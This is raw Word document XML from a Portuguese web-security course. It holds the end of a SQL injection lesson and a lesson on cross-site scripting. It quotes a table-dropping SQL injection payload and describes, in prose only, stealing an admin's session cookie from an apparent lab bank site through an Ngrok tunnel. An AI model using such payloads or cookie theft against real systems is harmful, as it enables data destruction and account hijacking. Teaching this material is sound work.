    <w:p w14:paraId="16609256" w14:textId="77777777" w:rsidR="00D93ADD" w:rsidRDefault="00D93ADD" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAFD257" w14:textId="3DE96420" w:rsidR="00D93ADD" w:rsidRPr="0057338D" w:rsidRDefault="00D93ADD" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D93ADD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">A parte </w:t>
      </w:r>
      <w:r w:rsidRPr="00D93ADD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'; DROP TABLE users; --'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D93ADD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> é uma tentativa de injeção de SQL que poderia ser usada para tentar excluir a tabela "users" do banco de dados. A sequência </w:t>
      </w:r>
      <w:r w:rsidRPr="00D93ADD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00D93ADD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> é um comentário em SQL, que pode ser usado para ignorar o restante da consulta original.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5E0BC" w14:textId="7C3E4C11" w:rsidR="0057338D" w:rsidRPr="00D93ADD" w:rsidRDefault="0057338D" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039BCB6D" w14:textId="60F18B51" w:rsidR="00462FBB" w:rsidRDefault="00F32982" w:rsidP="00F32982">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F32982">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Aula 9 – Cross-Site-Scripting (XSS) – Atacando o cliente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516252D4" w14:textId="77777777" w:rsidR="00F32982" w:rsidRDefault="00F32982" w:rsidP="00F32982"/>
    <w:p w14:paraId="1016F31A" w14:textId="61B040AC" w:rsidR="006702D2" w:rsidRPr="006702D2" w:rsidRDefault="006702D2" w:rsidP="006702D2">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006702D2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que é XSS</w:t>
      </w:r>
      <w:r w:rsidR="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821C7AC" w14:textId="77777777" w:rsidR="006702D2" w:rsidRDefault="006702D2" w:rsidP="00F32982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF7860A" w14:textId="77777777" w:rsidR="007978FC" w:rsidRDefault="006702D2" w:rsidP="007978FC">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006702D2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>XSS é uma vulnerabilidade que ocorre quando a aplicação web não trata adequadamente os dados fornecidos pelo usuário, permitindo que ele injete código JavaScript no servidor ou no navegador.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006702D2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Com isso, o atacante pode executar scripts maliciosos no navegador da vítima, podendo obter, alterar ou deletar informações sensíveis</w:t>
      </w:r>
      <w:r w:rsidR="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37835F97" w14:textId="77777777" w:rsidR="007978FC" w:rsidRDefault="007978FC" w:rsidP="007978FC">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F8E6B2" w14:textId="64DE1974" w:rsidR="007978FC" w:rsidRDefault="007978FC" w:rsidP="007978FC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Como identificar XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6F0F5" w14:textId="77777777" w:rsidR="007978FC" w:rsidRPr="007978FC" w:rsidRDefault="007978FC" w:rsidP="007978FC"/>
    <w:p w14:paraId="4820642C" w14:textId="05676734" w:rsidR="007978FC" w:rsidRDefault="007978FC" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Para identificar XSS, podemos testar os parâmetros da URL ou dos formulários da aplicação, passando </w:t>
      </w:r>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>caracteres especiais e códigos HTML e Javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008042E8">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Se a aplicação retornar o payload na página como código e não como texto, o navegador irá executá-lo</w:t>
      </w:r>
      <w:r w:rsidRPr="007978FC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, configurando uma vulnerabilidade de XSS</w:t>
      </w:r>
      <w:r w:rsidR="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E66A90" w14:textId="77777777" w:rsidR="00F067BA" w:rsidRDefault="00F067BA" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F84DC28" w14:textId="2C85A698" w:rsidR="00F067BA" w:rsidRPr="0063000A" w:rsidRDefault="00F067BA" w:rsidP="00F067BA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0063000A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Como explorar XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0063000A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F16BD3" w14:textId="77777777" w:rsidR="00F067BA" w:rsidRPr="00F067BA" w:rsidRDefault="00F067BA" w:rsidP="00F067BA"/>
    <w:p w14:paraId="5D132BCC" w14:textId="1F55379B" w:rsidR="00F067BA" w:rsidRDefault="00F067BA" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Para explorar XSS, podemos usar algumas técnicas manuais ou automatizadas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>As técnicas manuais envolvem o uso</w:t>
      </w:r>
      <w:r w:rsidRPr="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>de tags HTML como &lt;script&gt;, &lt;img&gt;, &lt;iframe&gt;, etc.,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F067BA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> para inserir código JavaScript na página. As técnicas automatizadas envolvem o uso de ferramentas como BeEF, que simplificam e aceleram o processo de exploração</w:t>
      </w:r>
      <w:r w:rsidR="00FA1054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBB309C" w14:textId="77777777" w:rsidR="00F93E19" w:rsidRDefault="00F93E19" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F630B4" w14:textId="2266098F" w:rsidR="00C35C37" w:rsidRPr="0063000A" w:rsidRDefault="00C35C37" w:rsidP="00C35C37">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Como invadir o painel administrativo</w:t>
      </w:r>
      <w:r w:rsidRPr="0063000A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65933A0B" w14:textId="77777777" w:rsidR="00C35C37" w:rsidRDefault="00C35C37" w:rsidP="00C35C37">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AF43D0" w14:textId="77777777" w:rsidR="00C35C37" w:rsidRDefault="00C35C37" w:rsidP="00C35C37">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Para invadir o painel administrativo da aplicação web do Banco CN, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>precisamos obter o cookie de sessão do usuário admin do site.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esse cookie não está protegido pela flag HttpOnly, que impediria que ele fosse extraído pelo JavaScript da aplicação. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332595C9" w14:textId="5A088551" w:rsidR="00C35C37" w:rsidRPr="00C35C37" w:rsidRDefault="00C35C37" w:rsidP="00D83CEF">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Então podemos usar uma </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ferramenta chamada Ngrok</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, q</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ue cria um túnel entre o nosso servidor local e a internet.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C37">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com isso, conseguimos enviar o cookie de sessão para o nosso servidor através de uma requisição HTTP disfarçada de imagem. Com esse cookie, conseguimos acessar o painel administrativo sem precisar das credenciais de acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C38D82" w14:textId="77777777" w:rsidR="00F93E19" w:rsidRDefault="00F93E19" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5630C1A7" w14:textId="77777777" w:rsidR="006B76C6" w:rsidRPr="00F32982" w:rsidRDefault="006B76C6" w:rsidP="006702D2">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006B76C6" w:rsidRPr="00F32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B1F6A" w14:textId="77777777" w:rsidR="003F49AB" w:rsidRDefault="003F49AB" w:rsidP="00F16C3B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13A79E76" w14:textId="77777777" w:rsidR="003F49AB" w:rsidRDefault="003F49AB" w:rsidP="00F16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rta">
    <w:panose1 w:val="000005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BADBE" w14:textId="77777777" w:rsidR="003F49AB" w:rsidRDefault="003F49AB" w:rsidP="00F16C3B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F65BB9D" w14:textId="77777777" w:rsidR="003F49AB" w:rsidRDefault="003F49AB" w:rsidP="00F16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7D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C04C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C0A45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B06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E746D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71AA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32147"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2DE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63379"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B438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03716"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1CC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93047"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B11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3051B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F968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62396"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB62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C444A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AF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2065271">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="23605316">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1350059752">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1820925311">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1695884488">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2090616481">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="841090167">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="335617087">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1012758134">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="19905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5C"/>
    <w:rsid w:val="000009A8"/>
    <w:rsid w:val="0001756C"/>
    <w:rsid w:val="000177D7"/>
    <w:rsid w:val="00042D97"/>
    <w:rsid w:val="000447C6"/>
    <w:rsid w:val="000633B5"/>
    <w:rsid w:val="0007646E"/>
    <w:rsid w:val="00084A73"/>
    <w:rsid w:val="000928EE"/>
    <w:rsid w:val="000945CF"/>
    <w:rsid w:val="00094E75"/>
    <w:rsid w:val="000B0B6C"/>
    <w:rsid w:val="000B33BD"/>
    <w:rsid w:val="000C2440"/>
    <w:rsid w:val="000D10DC"/>
    <w:rsid w:val="000E7F34"/>
    <w:rsid w:val="00104D15"/>
    <w:rsid w:val="00120BDC"/>
    <w:rsid w:val="00127692"/>
    <w:rsid w:val="001440C3"/>
    <w:rsid w:val="00146C01"/>
    <w:rsid w:val="0015143E"/>
    <w:rsid w:val="00157D73"/>
    <w:rsid w:val="001636E0"/>
    <w:rsid w:val="00163764"/>
    <w:rsid w:val="00193CBD"/>
    <w:rsid w:val="001A3087"/>
    <w:rsid w:val="001A511E"/>
    <w:rsid w:val="001A7860"/>
    <w:rsid w:val="001C0314"/>
    <w:rsid w:val="001C3F3C"/>
    <w:rsid w:val="001C629A"/>
    <w:rsid w:val="001D0D5B"/>
    <w:rsid w:val="001E05E6"/>
    <w:rsid w:val="001E0B68"/>
    <w:rsid w:val="001E272A"/>
    <w:rsid w:val="001E409F"/>
    <w:rsid w:val="001E61B1"/>
    <w:rsid w:val="001F11B2"/>
    <w:rsid w:val="001F38EF"/>
    <w:rsid w:val="001F7DCC"/>
    <w:rsid w:val="00211B39"/>
    <w:rsid w:val="00230120"/>
    <w:rsid w:val="00233171"/>
    <w:rsid w:val="00247B2A"/>
    <w:rsid w:val="002512A2"/>
    <w:rsid w:val="00255B05"/>
    <w:rsid w:val="00260214"/>
    <w:rsid w:val="00262B9B"/>
    <w:rsid w:val="002844BF"/>
    <w:rsid w:val="002870C8"/>
    <w:rsid w:val="002910BC"/>
    <w:rsid w:val="002937AC"/>
    <w:rsid w:val="002D16A8"/>
    <w:rsid w:val="002D3B03"/>
    <w:rsid w:val="002D7394"/>
    <w:rsid w:val="002E7751"/>
    <w:rsid w:val="002F110B"/>
    <w:rsid w:val="002F1399"/>
    <w:rsid w:val="003016FF"/>
    <w:rsid w:val="00304291"/>
    <w:rsid w:val="003053B9"/>
    <w:rsid w:val="0031259F"/>
    <w:rsid w:val="00315E96"/>
    <w:rsid w:val="003175F5"/>
    <w:rsid w:val="00317FE3"/>
    <w:rsid w:val="00322879"/>
    <w:rsid w:val="00327283"/>
    <w:rsid w:val="00327CC5"/>
    <w:rsid w:val="00331B09"/>
    <w:rsid w:val="00340941"/>
    <w:rsid w:val="00346637"/>
    <w:rsid w:val="003539BB"/>
    <w:rsid w:val="00354AE2"/>
    <w:rsid w:val="0035766A"/>
    <w:rsid w:val="0036287C"/>
    <w:rsid w:val="00387127"/>
    <w:rsid w:val="003B7054"/>
    <w:rsid w:val="003C1C21"/>
    <w:rsid w:val="003D002C"/>
    <w:rsid w:val="003E02C8"/>
    <w:rsid w:val="003E26FF"/>
    <w:rsid w:val="003F49AB"/>
    <w:rsid w:val="004155C5"/>
    <w:rsid w:val="0042140A"/>
    <w:rsid w:val="00422252"/>
    <w:rsid w:val="0042612E"/>
    <w:rsid w:val="004344E5"/>
    <w:rsid w:val="00451C44"/>
    <w:rsid w:val="00462FBB"/>
    <w:rsid w:val="0046644A"/>
    <w:rsid w:val="0046746F"/>
    <w:rsid w:val="004949D9"/>
    <w:rsid w:val="004A375C"/>
    <w:rsid w:val="004A3E3F"/>
    <w:rsid w:val="004B6B65"/>
    <w:rsid w:val="004B706B"/>
    <w:rsid w:val="004C4BE6"/>
    <w:rsid w:val="004F7113"/>
    <w:rsid w:val="004F7423"/>
    <w:rsid w:val="00502C3F"/>
    <w:rsid w:val="00503986"/>
    <w:rsid w:val="0051158A"/>
    <w:rsid w:val="005141DE"/>
    <w:rsid w:val="005150DF"/>
    <w:rsid w:val="00521F07"/>
    <w:rsid w:val="0054342D"/>
    <w:rsid w:val="00556248"/>
    <w:rsid w:val="00562896"/>
    <w:rsid w:val="005635CC"/>
    <w:rsid w:val="00563E7B"/>
    <w:rsid w:val="00567B9A"/>
    <w:rsid w:val="0057338D"/>
    <w:rsid w:val="00583A84"/>
    <w:rsid w:val="00584FF9"/>
    <w:rsid w:val="00586F21"/>
    <w:rsid w:val="00596736"/>
    <w:rsid w:val="005A0A2A"/>
    <w:rsid w:val="005A2308"/>
    <w:rsid w:val="005B0C40"/>
    <w:rsid w:val="005B6AAD"/>
    <w:rsid w:val="005C2BF8"/>
    <w:rsid w:val="005D7AF2"/>
    <w:rsid w:val="005E15C8"/>
    <w:rsid w:val="005E1E79"/>
    <w:rsid w:val="005E3FBF"/>
    <w:rsid w:val="005F2C37"/>
    <w:rsid w:val="005F5D01"/>
    <w:rsid w:val="006006C4"/>
    <w:rsid w:val="006011A5"/>
    <w:rsid w:val="00606DE4"/>
    <w:rsid w:val="00625CDE"/>
    <w:rsid w:val="0062646A"/>
    <w:rsid w:val="0063000A"/>
    <w:rsid w:val="006435AA"/>
    <w:rsid w:val="00646097"/>
    <w:rsid w:val="00646675"/>
    <w:rsid w:val="00657083"/>
    <w:rsid w:val="00660B6A"/>
    <w:rsid w:val="006611E9"/>
    <w:rsid w:val="00661F26"/>
    <w:rsid w:val="006670EC"/>
    <w:rsid w:val="006702D2"/>
    <w:rsid w:val="006A5A67"/>
    <w:rsid w:val="006B18CF"/>
    <w:rsid w:val="006B1CE2"/>
    <w:rsid w:val="006B76C6"/>
    <w:rsid w:val="006D1985"/>
    <w:rsid w:val="006D3B32"/>
    <w:rsid w:val="006D3F87"/>
    <w:rsid w:val="006D4F3F"/>
    <w:rsid w:val="006E45E7"/>
    <w:rsid w:val="006E7A3B"/>
    <w:rsid w:val="006F0CC8"/>
    <w:rsid w:val="00706D15"/>
    <w:rsid w:val="00711C8C"/>
    <w:rsid w:val="00727F97"/>
    <w:rsid w:val="00733574"/>
    <w:rsid w:val="00745FA7"/>
    <w:rsid w:val="00750688"/>
    <w:rsid w:val="00752588"/>
    <w:rsid w:val="00752DCA"/>
    <w:rsid w:val="007603CB"/>
    <w:rsid w:val="00773423"/>
    <w:rsid w:val="007804A9"/>
    <w:rsid w:val="00780E7E"/>
    <w:rsid w:val="00787E64"/>
    <w:rsid w:val="00794127"/>
    <w:rsid w:val="007978FC"/>
    <w:rsid w:val="007A4502"/>
    <w:rsid w:val="007A6108"/>
    <w:rsid w:val="007A6269"/>
    <w:rsid w:val="007B7CF2"/>
    <w:rsid w:val="007C1A10"/>
    <w:rsid w:val="007C7EB8"/>
    <w:rsid w:val="007D0232"/>
    <w:rsid w:val="007D4DB6"/>
    <w:rsid w:val="007E4457"/>
    <w:rsid w:val="007E656B"/>
    <w:rsid w:val="007E6A61"/>
    <w:rsid w:val="008042E8"/>
    <w:rsid w:val="00805CA0"/>
    <w:rsid w:val="00806D0F"/>
    <w:rsid w:val="008170D5"/>
    <w:rsid w:val="00827643"/>
    <w:rsid w:val="00836177"/>
    <w:rsid w:val="00840AFB"/>
    <w:rsid w:val="008416E7"/>
    <w:rsid w:val="00846F91"/>
    <w:rsid w:val="008500FD"/>
    <w:rsid w:val="00867D01"/>
    <w:rsid w:val="0087038E"/>
    <w:rsid w:val="008720AA"/>
    <w:rsid w:val="00876AAD"/>
    <w:rsid w:val="00896522"/>
    <w:rsid w:val="008A5B9D"/>
    <w:rsid w:val="008B1ABB"/>
    <w:rsid w:val="008B4E0C"/>
    <w:rsid w:val="008B52DA"/>
    <w:rsid w:val="008C0660"/>
    <w:rsid w:val="008D18A8"/>
    <w:rsid w:val="008D673B"/>
    <w:rsid w:val="008E18A0"/>
    <w:rsid w:val="008E6746"/>
    <w:rsid w:val="008F3C3E"/>
    <w:rsid w:val="00903BBB"/>
    <w:rsid w:val="009131F4"/>
    <w:rsid w:val="0092281B"/>
    <w:rsid w:val="00924F98"/>
    <w:rsid w:val="00924FF6"/>
    <w:rsid w:val="00926A16"/>
    <w:rsid w:val="0093156F"/>
    <w:rsid w:val="00934CC2"/>
    <w:rsid w:val="009350E5"/>
    <w:rsid w:val="0094316A"/>
    <w:rsid w:val="009437F1"/>
    <w:rsid w:val="00945CE0"/>
    <w:rsid w:val="00947A7A"/>
    <w:rsid w:val="0095526E"/>
    <w:rsid w:val="009556D4"/>
    <w:rsid w:val="009563A1"/>
    <w:rsid w:val="00956BDC"/>
    <w:rsid w:val="0097357C"/>
    <w:rsid w:val="00975E2B"/>
    <w:rsid w:val="00992546"/>
    <w:rsid w:val="00997519"/>
    <w:rsid w:val="009C2032"/>
    <w:rsid w:val="009D3EFD"/>
    <w:rsid w:val="009D4C5A"/>
    <w:rsid w:val="009E5B4F"/>
    <w:rsid w:val="00A020D0"/>
    <w:rsid w:val="00A13FC6"/>
    <w:rsid w:val="00A17875"/>
    <w:rsid w:val="00A23A24"/>
    <w:rsid w:val="00A37D82"/>
    <w:rsid w:val="00A40C89"/>
    <w:rsid w:val="00A676A0"/>
    <w:rsid w:val="00A72B29"/>
    <w:rsid w:val="00A74DF3"/>
    <w:rsid w:val="00A8369A"/>
    <w:rsid w:val="00A84E1E"/>
    <w:rsid w:val="00AA51AB"/>
    <w:rsid w:val="00AC6C1D"/>
    <w:rsid w:val="00AC7EAA"/>
